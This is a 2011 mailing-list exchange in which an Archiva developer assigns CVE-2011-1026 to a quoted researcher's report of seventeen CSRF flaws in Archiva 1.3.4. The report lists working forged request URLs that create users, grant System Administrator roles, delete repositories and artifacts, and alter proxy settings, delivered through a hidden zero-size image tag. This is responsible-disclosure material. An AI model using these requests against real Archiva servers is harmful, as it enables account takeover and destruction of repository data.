Thanks for reporting this, however, it should have been sent/reported to security@ first. I've forwarded this to the correct list and the CVE-ID is CVE-2011-1026. The CSRF issues aren't considered absolutely critical but we're already working on the fix and will schedule another release as soon as possible.
-Deng On Mon, Feb 28, 2011 at 3:31 PM, Walikar Riyaz Ahemed Dawalmalik <[email protected]> wrote: > Hi, > > The latest version of Archiva (1.3.4) is also vulnerable to multiple > CSRF issues. The following are the details and exploit code. Please > confirm this mail and revert with an update. I will be disclosing this > to the security community after the issues have been fixed. > > Project: Archiva > Severity: Critical > Versions: 1.3.4 (other versions may be affected) > Exploit type: Multiple CSRF > > CSRF: > > An attacker can build a simple html page containing a hidden Image tag > (eg: <img src=vulnurl width=0 height=0 />) and entice the administrator > to access the page resulting in the following issues: > > 1. An attacker can create a new user using the administrator's session: > http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.use > rname=tester123&user.fullName=test&user.email=test%40test.com&user.passw > ord=abc&user.confirmPassword=abc > > 2. An attacker can delete a user: > http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username > =test > > 3. An attacker can elevate privileges of accounts: > http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=t > est&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_a > ddNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrato > r&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSel > ectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repos > itory+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&s > ubmitRolesButton=Submit > > 4. An attacker can delete the Configuration and contents along with the > repository: > http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&; > method%3AdeleteContents=Delete+Configuration+and+Contents > > 5. An attacker can delete an artifact from any repository: > http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&a > rtifactId=1&version=1&repositoryId=snapshots > > 6. An attacker can add a Repository Group: > http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repository > Group.id=csrfgrp > > 7. An attacker can delete a repository Group: > http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGro > upId=test&method%3Adelete=Confirm > > 8. An attacker can disable Proxy connectors: > http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action > ?target=maven2-repository.dev.java.net&source=internal > > 9. An attacker can Delete proxy connectors: > http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?t > arget=maven2-repository.dev.java.net&source=snapshots > > 10. An attacker can delete Legacy Artifact Path under Legacy Support: > http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path > =jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar > > 11. An attacker can create a New Network Proxy configuration: > http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&pro > xy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.us > ername=&proxy.password= > > 12. An attacker can delete an existing network proxy configuration: > http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?pro > xyid=myproxy > > 13. An attacker can add custom file extensions to the repository > scanning page: > http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePatter > n.action?pattern=**%2F*.rum&fileTypeId=artifacts > > 14. An attacker can remove an existing file extension from the > repository scanning page: > http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePat > tern.action?pattern=**%2F*.rum&fileTypeId=artifacts > > 15. An attacker can change the settings on the Known Consumers section: > http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsum > ers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentC > onsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksu > ms&enabledKnownContentConsumers=index-content&enabledKnownContentConsume > rs=metadata-updater&enabledKnownContentConsumers=repository-purge&enable > dKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=v > alidate-checksums > > 16. An attacker can enable/disable Unprocessed Consumer settings: > http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers. > action?enabledUnprocessedConsumers=update-db-project > > 17. An attacker can change settings on the Cleanup Consumers section: > http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.acti > on?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanup > Consumers=not-present-remove-db-project&enabledCleanupConsumers=not-pres > ent-remove-indexed > > > I would request you to provide CVE-IDs for the vulnerabilities so that I > can co-ordinate a full disclosure after these issues are fixed. > > Warm Regards, > Riyaz Ahemed Walikar || Senior Engineer - Professional Services > Vulnerability Assessment & Penetration Testing > Mobile: +91-98860-42242 || Extn: 5601 > > > The information transmitted is intended only for the person or entity to > which it is addressed and may contain confidential and/or privileged material. > Any review, re-transmission, dissemination or other use of or taking of any > action in reliance upon,this information by persons or entities other than > the intended recipient is prohibited. > If you received this in error, please contact the sender and delete the > material from your computer. > Microland takes all reasonable steps to ensure that its electronic > communications are free from viruses. > However, given Internet accessibility, the Company cannot accept liability > for any virus introduced by this e-mail or any attachment and you are advised > to use up-to-date virus checking software. > >
